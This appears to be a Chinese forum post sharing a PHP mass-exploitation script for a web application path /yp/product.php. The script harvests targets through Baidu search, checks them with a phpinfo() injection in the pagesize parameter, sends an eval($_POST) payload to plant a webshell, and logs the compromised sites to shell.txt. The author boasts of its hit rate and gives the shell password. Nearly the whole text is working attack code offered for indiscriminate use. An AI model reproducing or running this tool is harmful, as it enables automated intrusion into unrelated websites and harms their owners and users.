玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php //检测是否存在漏洞 //模拟POST或者GET请求函数。 批量的EXP如下,这威力很大。请各位大牛自重 。 error_reporting(E_ERROR); set_time_limit(0); $keyword=’inurl:about/joinus’ ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadBaiduList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file(‘url.txt’); if (in_array(“$url\r\n”,$url_list)){ echo “[-] Links repeat\n”; }else{ $fp = @fopen(‘url.txt’, ‘a’); @fwrite($fp, $url.”\r\n”); @fclose($fp); print_r(” [-] Get …… $url\r\n”); if(okbug($url)){ $exploit=exploit($url); $ors=okor($url); if ($ors){ echo “[*] Shell:-> “.$url.”/yp/fuck.php\n”; $fp = @fopen(‘shell.txt’, ‘a’); @fwrite($fp, $url.”/yp/fuck.php\r\n”); @fclose($fp); } }else{ print “[-] No Bug!\n”; } } } } function exploit($url){ $host=$url; $port=”80″; $content ; $data = ‘POST /yp/product.php?pagesize=${${@eval%28$_POST[a]%29}} HTTP/1.1′.”\r\n”; $data .= “X-Forwarded-For: 199.1.88.29\r\n”; $data .= “Referer: http://$host\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n”; $data .= “Host: $host\r\n”; $data .= “Content-Length: “.strlen($content).”\r\n”; $data .= “Cache-Control: no-cache\r\n\r\n”; $data .= $content.”\r\n”; $ock=fsockopen($host,$port); if (!$ock) { echo “[*] No response from $host\n”; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } function okor($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,”GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, ’200′) !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,’GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1′.”\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match(‘/(php.ini)/i’,$data)) { return true; }else{ return false; } } function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ”; $nowpage = ($nowpage-1)*10; $fp = @fsockopen(‘www.baidu.com’,80,$errno,$errstr,$timeout); @fputs($fp,”GET /s?wd=”.urlencode($keyword).”&pn=”.$nowpage.” HTTP/1.1\r\nHost:[url]www.baidu.com[/url]\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all(“/\}\)\” href\=\”http\:\/\/([^~]*?)\” target\=\”\_blank\”/i”,$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode(‘/’,$tmp[1][$i]); $array[] = str_replace(‘http://’,”,$row[0]); } return $array; } ?> |
|